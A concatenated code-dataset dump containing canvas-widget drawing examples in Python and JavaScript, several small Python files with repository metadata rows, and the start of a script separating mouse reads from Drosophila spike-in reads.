# Draw a star (always positioned and sized relative to the frame)
widget.star(
x=40, y=25, radius=30,
points=5, # optional number of points
point_factor=2.1, # optional scale factor for outer radius
color="magenta",
fill=False,
lineWidth=5,
lineDash=[5,5],
)
''')
def js_star_example():
return js_example(
"""
### Drawing stars
The `star` method draws a star on the canvas.
""",
'''
// Draw a star (always positioned and sized relative to the frame)
element.star({
x:40, y:25, radius:30,
points:5, // optional number of points
point_factor:2.1, // optional scale factor for outer radius
color:"magenta",
fill:false,
lineWidth:5,
lineDash:[5,5],
})
''')
def py_rect_example():
return python_example(
"""
### Drawing rectangles with canvas relative size
The `rect` method draws a rectangle sized relative to the canvas
coordinate system. `rect`s on two frames with the same width and height
will have the same size.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a rectangle positioned and sized relative to the frame.
(x,y) = (4, 2.5)
frame.rect(
x=x, y=y, # rectangle position relative to the frame
w=50, h=40, # width and height relative to the canvas
dx=-10, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
color="green",
degrees=10, # optional rotation in degrees
fill=False,
lineWidth=5,
lineDash=[5,5],
)
# Draw a reference point at (x, y)
frame.circle(x, y, 5, "red")
frame.lower_left_axes(color="pink")
''')
def js_rect_example():
return js_example(
"""
### Drawing rectangles with canvas relative size
The `rect` method draws a rectangle sized relative to the canvas
coordinate system. `rect`s on two frames with the same width and height
will have the same size.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
);
// Draw a rectangle positioned and sized relative to the frame.
var x = 4;
var y = 2.5;
frame.rect({
x:x, y:y, // rectangle position relative to the frame
w:50, h:40, // width and height relative to the canvas
dx:-10, dy:-10, // offset of lower left corner from (x,y) relative to the canvas
color:"green",
degrees:10, // optional rotation in degrees
fill:false,
lineWidth:5,
lineDash:[5,5],
});
// Draw a reference point at (x, y)
frame.circle({x:x, y:y, r:5, color:"red"});
frame.lower_left_axes({color:"pink", max_tick_count:5})
''')
def py_canvas_rect_example():
return python_example(
"""
### Drawing rectangles with frame relative size
The `frame_rect` method draws a rectangle sized relative to the current reference frame
coordinate system. `frame_rect`s on two frames with the same width and height
may have the different sizes.
""",
'''
frame = widget.frame_region(
minx=10, miny=10, maxx=100, maxy=100,
frame_minx=-3, frame_miny=0, frame_maxx=3, frame_maxy=6,
)
# Draw a rectangle positioned and sized relative to the frame.
(x,y) = (4, 2.5)
frame.frame_rect(
x=x, y=y, # rectangle position
w=5, h=4, # width and height relative to frame
dx=-1, dy=-1, # offset of lower left corner from (x,y) relative to frame
color="green",
fill=False,
degrees=10, # optional rotation in degrees
lineWidth=5,
lineDash=[5,5],
)
# Draw a reference point at (x, y)
frame.circle(x, y, 5, "red")
frame.lower_left_axes(color="pink")
''')
def js_canvas_rect_example():
return js_example(
"""
### Drawing rectangles with frame relative size
The `frame_rect` method draws a rectangle sized relative to the current reference frame
coordinate system. `frame_rect`s on two frames with the same width and height
may have the different sizes.
""",
'''
frame = element.frame_region(
10, 10, 100, 100,
-3, 0, 3, 6,
);
// Draw a rectangle positioned and sized relative to the frame.
var x = 4;
var y = 2.5;
frame.frame_rect({
x:x, y:y, // rectangle position
w:5, h:4, // width and height relative to frame
dx:-1, dy:-1, // offset of lower left corner from (x,y) relative to frame
color:"green",
fill:false,
degrees:10, // optional rotation in degrees
lineWidth:5,
lineDash:[5,5],
})
// Draw a reference point at (x, y)
frame.circle({x:x, y:y, r:5, color:"red"});
frame.lower_left_axes({color:"pink", max_tick_count:5})
''')
def py_text_example():
return python_example(
"""
### Drawing text
The `text` method draws a text screen on the canvas.
The position of the text is determined by the current reference frame
but the text font parameters are relative to the shared canvas coordinate space.
""",
'''
(x, y) = (50,20)
widget.text(
x=x, y=y,
text="We the people",
color="white", # Optional color (default: "black")
font="italic 52px Courier", # optional
background="#a00", # optional
degrees=-15, # optional rotation in degrees
align="center", # or "left" or "right", optional
valign="center", # or "bottom", optional
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''')
def js_text_example():
return js_example(
"""
### Drawing text
The `text` method draws a text screen on the canvas.
The position of the text is determined by the current reference frame
but the text font parameters are relative to the shared canvas coordinate space.
""",
'''
var x = 240;
var y = 30;
element.text({
x:x, y:y,
text:"We the people",
color:"white", // Optional color (default: "black")
font:"italic 52px Courier", // optional
background:"#a00", // optional
degrees:-15, // optional rotation in degrees
align:"center", // or "left" or "right", optional
valign:"center", // or "bottom", optional
})
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"red"});
''')
def js_event_example():
return js_example(
"""
### Attaching event callbacks
The `object.on(etype, callback)`
attaches a `callback` to be called when the object
recieves an event of type `etype`.
""",
'''
// this circle cannot be mutated and does not respond to events because it is not named.
element.circle({x:0, y:0, r:100, color:"#e99"});
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"Click me please", degrees:45, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_no_name_no_event_example():
return js_example(
"""
### Unnamed objects are invisible to events
If an object is not named it will not respond to events
but a named object drawn undernieth the unnamed object may
receive the event.
A named object may also disable events by setting `events=False`
-- the resulting object can be changed or deleted but it will not respond to events.
```Javascript
widget.circle({x:0, y:0, r:100, color:"#e99", name:True, events:False});
```
Below the circle obscures the text but clicks in the
center of the circle are recieved by the text.
""",
'''
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"CLICK THE CENTER OF THE CIRCLE", degrees:25, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// This circle cannot be mutated and does not respond to events because it is not named.
// The txt1 undernieth the circle may respond to clicks on the circle.
element.circle({x:0, y:0, r:70, color:"#e99"});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_event_top_only_example():
return js_example(
"""
### Only the top named object responds to events
Only the top named object under an event receives the event even if
it is drawn using a transparent color.
Any object underneith the top object will not receive the event.
""",
'''
// this text is named and can be mutated and can respond to events
var txt1 = element.text({x:0, y:0, text:"TRY TO CLICK THE CENTER OF THE CIRCLE", degrees:15, name:true,
font:"40pt Arial", color:"#e3e", background:"#9e9", align:"center", valign:"center"});
// This circle CAN be mutated and MAY respond to events because it is named.
// The txt1 undernieth the circle will not respond to clicks on the circle.
element.circle({x:0, y:0, r:70, color:"#e99", name:true});
// add a click event bound to the txt which transitions the text rotation
var on_click = function() {
var seconds_duration = 5;
txt1.transition({text:"That tickles", degrees:720, color:"#f90", background:"#009"}, seconds_duration);
};
txt1.on("click", on_click)
''')
def js_axes_example():
return js_example(
"""
### Drawing axes
The `left_axis`, `right_axis`, `bottom_axis`, `top_axis`, and `lower_left_axis` methods
draw axes on the canvas.
""",
'''
element.left_axis({
min_value:10,
max_value:80,
axis_origin:{x:40, y:0},
max_tick_count:3,
color:"green",
add_end_points:true
})
element.right_axis({
min_value:10,
max_value:80,
axis_origin:{x:240, y:0},
max_tick_count:7,
color:"red"
})
element.bottom_axis({
min_value:60,
max_value:110,
axis_origin:{x:0, y:0},
max_tick_count:5,
color:"blue"
})
element.top_axis({
min_value:130,
max_value:180,
axis_origin:{x:0, y:0},
max_tick_count:5,
color:"orange"
})
element.lower_left_axes({
min_x:50,
min_y:30,
max_x:210,
max_y:90,
x_anchor:130,
y_anchor:66,
max_tick_count:4,
color:"brown"
});
''', axes=False)
def py_full_image_example():
return python_example(
"""
### Drawing whole images
Before an image can be drawn on a canvas
the image must be loaded. The `name_imagea_url` methodß
loads an image from a file or a remote resource.
After the image has been loaded and named the `named_image`
draws the loaded image. If no subimage is specified
the whole image is drawn into the rectangular region.
A loaded image may be drawn any number of times.
""",
'''
# load the image from a remote resource
mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png"
widget.name_image_url(
image_name="mandrill",
url=mandrill_url,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw the *whole* image (don't specify the s* parameters)
image_name="mandrill",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-50, # optional offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''', embeddable=False)
def js_full_image_example():
return js_example(
"""
### Drawing whole images
Before an image can be drawn on a canvas
the image must be loaded. The `name_imagea_url` methodß
loads an image from a file or a remote resource.
After the image has been loaded and named the `named_image`
draws the loaded image. If no subimage is specified
the whole image is drawn into the rectangular region.
A loaded image may be drawn any number of times.
""",
'''
// load the image from a remote resource
var mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png";
element.name_image_url("mandrill", mandrill_url);
// draw the named image (any number of times)
var x = 50;
var y = 20;
element.named_image({ // Draw the *whole* image (don't specify the s* parameters)
image_name:"mandrill",
x:x, y:y, // rectangle position relative to the canvas
w:150, h:140, // width and height relative to the frame
dx:-30, dy:-50, // optional offset of lower left corner from (x,y) relative to the canvas
degrees:10, // optional rotation in degrees
});
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"magenta"});
''', embeddable=False)
def py_part_image_example():
return python_example(
"""
### Drawing parts of images
The `named_image`
draws part of a loaded image if the subimage parameters
sx, sy, sWidth, and sHeight are specified.
""",
'''
# load the image from a remote resource
mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png"
widget.name_image_url(
image_name="mandrill",
url=mandrill_url,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw just the eyes (by specifying the subimage)
image_name="mandrill",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=40, # width and height relative to the frame
dx=-30, dy=-10, # optional offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
sx=30, sy=15, # subimage upper left corner in image coordinates
sWidth=140, sHeight=20, # subimage extent in image coordinates
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''', embeddable=False)
def js_part_image_example():
return js_example(
"""
### Drawing parts of images
The `named_image`
draws part of a loaded image if the subimage parameters
sx, sy, sWidth, and sHeight are specified.
""",
'''
// load the image from a remote resource
var mandrill_url = "http://sipi.usc.edu/database/preview/misc/4.2.03.png";
element.name_image_url("mandrill", mandrill_url);
// draw the named image (any number of times)
var x = 50;
var y = 20;
// draw the named image (any number of times)
element.named_image({ // Draw the *whole* image (don't specify the s* parameters)
image_name:"mandrill",
x:x, y:y, // rectangle position relative to the canvas
w:150, h:140, // width and height relative to the frame
dx:-30, dy:-50, // optional offset of lower left corner from (x,y) relative to the canvas
degrees:10, // optional rotation in degrees
sx:30, sy:15, // subimage upper left corner in image coordinates
sWidth:140, sHeight:20, // subimage extent in image coordinates
});
// Draw a reference point at (x, y)
element.circle({x:x, y:y, r:5, color:"magenta"});
''', embeddable=False)
def py_bw_image_example():
return python_example(
"""
### Drawing black and white images from arrays
The `name_image_array`
can load a black and white image from a
2 dimensional `numpy` array. The numeric values in the
array should be in the range from 0 to 255.
""",
'''
# Make a "black and white" array.
import numpy as np
checkerboard = np.zeros((8,8))
for i in range(8):
for j in range(8):
if (i + j) % 2 == 0:
checkerboard[i,j] = 64 + 3*i*j
# Load the image from the array.
widget.name_image_array(
image_name="checkerboard",
np_array=checkerboard,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw just the eyes (by specifying the subimage)
image_name="checkerboard",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
degrees=10, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 5, "magenta")
''')
def py_color_image_example():
return python_example(
"""
### Drawing color images from arrays
The `name_image_array`
can load a color image from a
3 dimensional `numpy` array of shape "width by height by 3"
or "width by height by 4". The values at `array[:,:,1:3]` represent
the red, green, and blue color values for the pixel and should be in the range 0 to 255.
If provided the values at `array[:,:,3]` represent the opacity of the
pixel and should be in the range 0 (transparent) to 1.0 (fully opaque).
""",
'''
# Make a "color" numpy array
import numpy as np
checkerboard = np.zeros((8,8,3))
R = G = B = 255
for i in range(8):
for j in range(8):
if (i + j) % 2 == 0:
checkerboard[i,j] = (R, G, B)
R = (G + 123) % 256
else:
checkerboard[i,j] = (G, R, R)
G = (R + 201) % 256
# Load the image from the array
widget.name_image_array(
image_name="checkerboard",
np_array=checkerboard,
)
# draw the named image (any number of times)
(x, y) = (50,20)
widget.named_image( # Draw just the eyes (by specifying the subimage)
image_name="checkerboard",
x=x, y=y, # rectangle position relative to the canvas
w=150, h=140, # width and height relative to the frame
dx=-30, dy=-10, # offset of lower left corner from (x,y) relative to the canvas
degrees=-50, # optional rotation in degrees
)
# Draw a reference point at (x, y)
widget.circle(x, y, 10, "yellow")
''')
def html_hello_world():
from IPython.display import display, Markdown
txt = open("minimal.html").read()
L = ["```HTML", txt, "```"]
md = "\n".join(L)
display(Markdown(md)) | 33.008094 | 111 | 0.643046 | 5,394 | 36,705 | 4.293845 | 0.09492 | 0.004749 | 0.025819 | 0.018048 | 0.775744 | 0.75014 | 0.720047 | 0.710203 | 0.698761 | 0.695739 | 0 | 0.038779 | 0.236317 | 36,705 | 1,112 | 112 | 33.008094 | 0.787485 | 0.00049 | 0 | 0.305263 | 0 | 0 | 0.009626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.221053 | false | 0 | 0.026316 | 0.2 | 0.447368 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
a47f34da66634483663c102d2f6ac0337c109f62 | 42 | py | Python | modules/__init__.py | autonomousvision/data_aggregation | 76777156a465cbb77d6d5ab88da8f1812e7ff043 | [
"MIT"
] | 29 | 2020-03-19T14:11:15.000Z | 2022-02-01T14:51:40.000Z | modules/__init__.py | autonomousvision/data_aggregation | 76777156a465cbb77d6d5ab88da8f1812e7ff043 | [
"MIT"
] | 4 | 2020-06-24T18:49:27.000Z | 2020-11-18T12:31:26.000Z | modules/__init__.py | autonomousvision/data_aggregation | 76777156a465cbb77d6d5ab88da8f1812e7ff043 | [
"MIT"
] | 5 | 2020-06-24T02:00:13.000Z | 2021-06-05T08:54:34.000Z | from .screen_manager import ScreenManager
| 21 | 41 | 0.880952 | 5 | 42 | 7.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 42 | 1 | 42 | 42 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f14e7e682d2f946602e52d6a24b48c8f876442b8 | 164 | py | Python | transactions/views.py | Hesiod-Labs/Luca-Python | 4fc33449126ce94862ecd3f427c2902bebfcc74a | [
"MIT"
] | 1 | 2019-04-05T01:50:04.000Z | 2019-04-05T01:50:04.000Z | transactions/views.py | Hesiod-Labs/Luca-Python | 4fc33449126ce94862ecd3f427c2902bebfcc74a | [
"MIT"
] | null | null | null | transactions/views.py | Hesiod-Labs/Luca-Python | 4fc33449126ce94862ecd3f427c2902bebfcc74a | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("Work in Progress")
| 20.5 | 43 | 0.780488 | 22 | 164 | 5.818182 | 0.818182 | 0.15625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152439 | 164 | 7 | 44 | 23.428571 | 0.920863 | 0.140244 | 0 | 0 | 0 | 0 | 0.115108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
74b522b2c558e2df5ad030725797d5752ec9ed13 | 38 | py | Python | src/parse_audits/__main__.py | harmony5/parse_audits | 7f2ecc2ff0848759b4a602a3f8f83b7f698fc64a | [
"MIT"
] | 1 | 2021-05-01T09:10:41.000Z | 2021-05-01T09:10:41.000Z | src/parse_audits/__main__.py | harmony5/parse_audits | 7f2ecc2ff0848759b4a602a3f8f83b7f698fc64a | [
"MIT"
] | null | null | null | src/parse_audits/__main__.py | harmony5/parse_audits | 7f2ecc2ff0848759b4a602a3f8f83b7f698fc64a | [
"MIT"
] | null | null | null | from parser_cli.cli import cli
cli()
| 9.5 | 30 | 0.763158 | 7 | 38 | 4 | 0.571429 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 38 | 3 | 31 | 12.666667 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
74c73ad458e5600d401017748986b822006ba05d | 37,077 | py | Python | SplitSpikein.py | PavriLab/IgH_VDJ_PROcapseq | c8435a0cd651f81352ecdfa77a136b8d18301482 | [
"MIT"
] | null | null | null | SplitSpikein.py | PavriLab/IgH_VDJ_PROcapseq | c8435a0cd651f81352ecdfa77a136b8d18301482 | [
"MIT"
] | 2 | 2019-03-22T17:30:11.000Z | 2019-05-15T12:32:54.000Z | SplitSpikein.py | PavriLab/IgH_VDJ_PROcapseq | c8435a0cd651f81352ecdfa77a136b8d18301482 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import re, os, sys
from argparse import ArgumentParser, RawDescriptionHelpFormatter
# from collections import Counter
import pysam
#############
## Read Me ##
#############
# Based on the revised/cleaned version of DiscardNonIghReads.py
#
# Created: 07/jan/2020 by: kimon.froussios@imp.ac.at
#
# The major assumption of this script is that alignment was done with bowtie --best --strata -a
# This means that only equally-best alignments are reported as multimappers (by number of mismatches).
#################
## Parameters ##
################
usage = "Split mouse reads from drosophila spike-in reads"
version = "0.1.0"
# Main Parsers
parser = ArgumentParser(description=usage, formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-a", "--allSamFile", type=str, required=True, help="BAM file with all the mapped reads")
parser.add_argument("-o", "--outDir", type=str, required=True, dest="outDir", help="Destination directory.")
args = parser.parse_args()
#################
## Pre-defined Settings
################
# Flybase r6.27 - all chromosomes and scaffolds
spikeChroms = ["2L","2R","3L","3R","4","X","Y","mitochondrion_genome",
"rDNA","2Cen_mapped_Scaffold_10_D1684","2Cen_mapped_Scaffold_43_D1668","2R2_mapped_Scaffold_56_D1828","3Cen_mapped_Scaffold_1_D1896_D1895","3Cen_mapped_Scaffold_27_D1777","3Cen_mapped_Scaffold_31_D1643_D1653_D1791","3Cen_mapped_Scaffold_36_D1605","3Cen_mapped_Scaffold_41_D1641","3Cen_mapped_Scaffold_50_D1686","X3X4_mapped_Scaffold_6_D1712","X3X4_mapped_Scaffold_14_D1732","XY_mapped_Scaffold_42_D1648","Y_mapped_Scaffold_5_D1748_D1610","Y_mapped_Scaffold_9_D1573","Y_mapped_Scaffold_12_D1771","Y_mapped_Scaffold_15_D1727","Y_mapped_Scaffold_18_D1698","Y_mapped_Scaffold_20_D1762_D1719","Y_mapped_Scaffold_21_D1683_D1693","Y_mapped_Scaffold_23_D1638","Y_mapped_Scaffold_26_D1717","Y_mapped_Scaffold_30_D1720","Y_mapped_Scaffold_34_D1584","Y_mapped_Scaffold_53_D1765",
"Unmapped_Scaffold_4_D1555_D1692","Unmapped_Scaffold_8_D1580_D1567","Unmapped_Scaffold_11_D1754","Unmapped_Scaffold_13_D1782","Unmapped_Scaffold_17_D1756_D1775","Unmapped_Scaffold_22_D1753","Unmapped_Scaffold_24_D1707","Unmapped_Scaffold_28_D1723","Unmapped_Scaffold_29_D1705","Unmapped_Scaffold_32_D1773","Unmapped_Scaffold_35_D1599","Unmapped_Scaffold_37_D1608","Unmapped_Scaffold_38_D1625","Unmapped_Scaffold_44_D1670","Unmapped_Scaffold_45_D1673","Unmapped_Scaffold_46_D1675","Unmapped_Scaffold_48_D1678","Unmapped_Scaffold_51_D1697","Unmapped_Scaffold_52_D1739","Unmapped_Scaffold_54_D1776","Unmapped_Scaffold_58_D1862","Unmapped_Scaffold_60_D1601",
"211000022278279","211000022279762","211000022278033","211000022278089","211000022278170","211000022278224","211000022278269","211000022278354","211000022278391","211000022278415","211000022278678","211000022278894","211000022278978","211000022279018","211000022279130","211000022279169","211000022279344","211000022279387","211000022279450","211000022279594","211000022279735","211000022280087","211000022280171","211000022280577","211000022280583","211000022280626","211000022280652","211000022278095","211000022278096","211000022278164","211000022278171","211000022278205","211000022278493","211000022278521","211000022278535","211000022278581","211000022278611","211000022278672","211000022278673","211000022278676","211000022278711","211000022278712","211000022278765","211000022278858","211000022278859","211000022278860","211000022278888","211000022278889","211000022278926","211000022279011","211000022279095","211000022279096","211000022279097","211000022279116","211000022279117","211000022279118","211000022279139","211000022279147","211000022279148","211000022279155","211000022279156","211000022279157","211000022279158","211000022279159","211000022279191","211000022279265","211000022279308","211000022279309","211000022279310","211000022279370","211000022279371","211000022279372","211000022279373","211000022279376","211000022279389","211000022279463","211000022279480","211000022279517","211000022279521","211000022279522","211000022279538","211000022279539","211000022279540","211000022279575","211000022279576","211000022279578","211000022279613","211000022279634","211000022279645","211000022279647","211000022279691","211000022279692","211000022279693","211000022279694","211000022279695","211000022279699","211000022279700","211000022279711","211000022279743","211000022279744","211000022279745","211000022279746","211000022279849","211000022279850","211000022279858","211000022279866","211000022279868","211000022279869","211000022279872","211000022279898","211000022279948","211000022279953","211000022279964","211000022280008","211000022280015","211000022280037","211000022280046","211000022280051","211000022280058","211000022280070","211000022280080","211000022280081","211000022280093","211000022280098","211000022280105","211000022280126","211000022280127","211000022280128","211000022280131","211000022280137","211000022280149","211000022280202","211000022280214","211000022280227","211000022280251","211000022280284","211000022280314","211000022280446","211000022280462","211000022280473","211000022280490","211000022280498","211000022280503","211000022280508","211000022280520","211000022280524","211000022280533","211000022280551","211000022280560","211000022280564","211000022280589","211000022280621","211000022280643","211000022280653","211000022280654","211000022280655","211000022280688","211000022280772","211000022280659","211000022279579","211000022280596","211000022279719","211000022279098","211000022280761","211000022280328","211000022278031","211000022278032","211000022278038","211000022278047","211000022278049","211000022278072","211000022278074","211000022278090","211000022278091","211000022278098","211000022278100","211000022278106","211000022278114","211000022278119","211000022278120","211000022278123","211000022278127","211000022278132","211000022278134","211000022278136","211000022278137","211000022278138","211000022278139","211000022278140","211000022278143","211000022278144","211000022278145","211000022278151","211000022278152","211000022278157","211000022278158","211000022278166","211000022278167","211000022278174","211000022278176","211000022278178","211000022278179","211000022278182","211000022278184","211000022278185","211000022278191","211000022278194","211000022278195","211000022278196","211000022278197","211000022278199","211000022278200","211000022278202","211000022278203","211000022278204","211000022278206","211000022278207","211000022278210","211000022278211","211000022278212","211000022278215","211000022278216","211000022278217","211000022278219","211000022278220","211000022278221","211000022278223","211000022278240","211000022278244","211000022278247","211000022278248","211000022278253","211000022278254","211000022278256","211000022278257","211000022278258","211000022278260","211000022278262","211000022278263","211000022278265","211000022278267","211000022278271","211000022278272","211000022278273","211000022278274","211000022278276","211000022278280","211000022278281","211000022278282","211000022278283","211000022278284","211000022278285","211000022278286","211000022278287","211000022278290","211000022278291","211000022278294","211000022278295","211000022278296","211000022278301","211000022278302","211000022278304","211000022278305","211000022278306","211000022278311","211000022278312","211000022278313","211000022278327","211000022278328","211000022278333","211000022278334","211000022278335","211000022278345","211000022278348","211000022278349","211000022278351","211000022278356","211000022278357","211000022278362","211000022278366","211000022278369","211000022278370","211000022278371","211000022278372","211000022278376","211000022278377","211000022278378","211000022278384","211000022278385","211000022278386","211000022278387","211000022278388","211000022278390","211000022278392","211000022278395","211000022278396","211000022278398","211000022278399","211000022278401","211000022278403","211000022278404","211000022278406","211000022278407","211000022278409","211000022278410","211000022278412","211000022278413","211000022278416","211000022278419","211000022278420","211000022278421","211000022278423","211000022278424","211000022278426","211000022278427","211000022278429","211000022278430","211000022278432","211000022278435","211000022278438","211000022278439","211000022278440","211000022278441","211000022278445","211000022278446","211000022278451","211000022278452","211000022278456","211000022278497","211000022278503","211000022278506","211000022278507","211000022278511","211000022278514","211000022278515","211000022278517","211000022278520","211000022278525","211000022278526","211000022278528","211000022278530","211000022278533","211000022278536","211000022278537","211000022278539","211000022278540","211000022278541","211000022278546","211000022278547","211000022278548","211000022278549","211000022278550","211000022278556","211000022278558","211000022278559","211000022278562","211000022278568","211000022278569","211000022278571","211000022278573","211000022278574","211000022278575","211000022278576","211000022278580","211000022278582","211000022278585","211000022278588","211000022278589","211000022278592","211000022278593","211000022278594","211000022278597","211000022278599","211000022278600","211000022278602","211000022278604","211000022278641","211000022278650","211000022278651","211000022278652","211000022278653","211000022278668","211000022278675","211000022278680","211000022278686","211000022278688","211000022278689","211000022278697","211000022278699","211000022278702","211000022278707","211000022278708","211000022278714","211000022278716","211000022278717","211000022278718","211000022278720","211000022278721","211000022278723","211000022278727","211000022278729","211000022278730","211000022278732","211000022278733","211000022278735","211000022278738","211000022278740","211000022278744","211000022278745","211000022278747","211000022278748","211000022278750","211000022278751","211000022278754","211000022278755","211000022278757","211000022278758","211000022278759","211000022278761","211000022278768","211000022278769","211000022278773","211000022278776","211000022278777","211000022278780","211000022278781","211000022278785","211000022278786","211000022278788","211000022278790","211000022278793","211000022278794","211000022278804","211000022278807","211000022278808","211000022278848","211000022278849","211000022278862","211000022278865","211000022278870","211000022278875","211000022278883","211000022278884","211000022278887","211000022278890","211000022278891","211000022278898","211000022278899","211000022278901","211000022278903","211000022278915","211000022278916","211000022278917","211000022278919","211000022278922","211000022278923","211000022278927","211000022278928","211000022278929","211000022278932","211000022278934","211000022278937","211000022278940","211000022278943","211000022278944","211000022278945","211000022278946","211000022278947","211000022278948","211000022278949","211000022278952","211000022278953","211000022278958","211000022278960","211000022278962","211000022278963","211000022278966","211000022278968","211000022278969","211000022278970","211000022278972","211000022278973","211000022278974","211000022278977","211000022278979","211000022278980","211000022278982","211000022278983","211000022278988","211000022278989","211000022278992","211000022278993","211000022278996","211000022279000","211000022279001","211000022279002","211000022279003","211000022279013","211000022279014","211000022279015","211000022279016","211000022279017","211000022279021","211000022279022","211000022279023","211000022279029","211000022279039","211000022279040","211000022279042","211000022279044","211000022279048","211000022279049","211000022279050","211000022279051","211000022279052","211000022279053","211000022279056","211000022279057","211000022279058","211000022279061","211000022279069","211000022279070","211000022279087","211000022279088","211000022279089","211000022279091","211000022279094","211000022279100","211000022279102","211000022279114","211000022279115","211000022279120","211000022279121","211000022279124","211000022279125","211000022279126","211000022279127","211000022279128","211000022279132","211000022279135","211000022279141","211000022279143","211000022279144","211000022279146","211000022279149","211000022279151","211000022279152","211000022279154","211000022279160","211000022279162","211000022279168","211000022279172","211000022279175","211000022279177","211000022279178","211000022279179","211000022279180","211000022279182","211000022279183","211000022279185","211000022279189","211000022279192","211000022279193","211000022279195","211000022279197","211000022279198","211000022279199","211000022279200","211000022279203","211000022279207","211000022279208","211000022279212","211000022279214","211000022279215","211000022279217","211000022279218","211000022279221","211000022279228","211000022279229","211000022279230","211000022279232","211000022279233","211000022279237","211000022279239","211000022279240","211000022279242","211000022279243","211000022279246","211000022279247","211000022279252","211000022279257","211000022279258","211000022279259","211000022279262","211000022279267","211000022279274","211000022279276","211000022279282","211000022279284","211000022279285","211000022279288","211000022279289","211000022279311","211000022279317","211000022279318","211000022279324","211000022279325","211000022279329","211000022279336","211000022279337","211000022279343","211000022279345","211000022279351","211000022279353","211000022279354","211000022279355","211000022279356","211000022279358","211000022279359","211000022279360","211000022279361","211000022279362","211000022279365","211000022279366","211000022279369","211000022279374","211000022279375","211000022279378","211000022279380","211000022279384","211000022279393","211000022279394","211000022279396","211000022279400","211000022279405","211000022279406","211000022279407","211000022279409","211000022279411","211000022279412","211000022279413","211000022279414","211000022279415","211000022279416","211000022279417","211000022279418","211000022279420","211000022279421","211000022279422","211000022279423","211000022279424","211000022279425","211000022279430","211000022279431","211000022279432","211000022279433","211000022279436","211000022279441","211000022279442","211000022279443","211000022279444","211000022279445","211000022279448","211000022279449","211000022279453","211000022279454","211000022279456","211000022279462","211000022279464","211000022279465","211000022279469","211000022279470","211000022279473","211000022279474","211000022279476","211000022279477","211000022279479","211000022279481","211000022279483","2110000222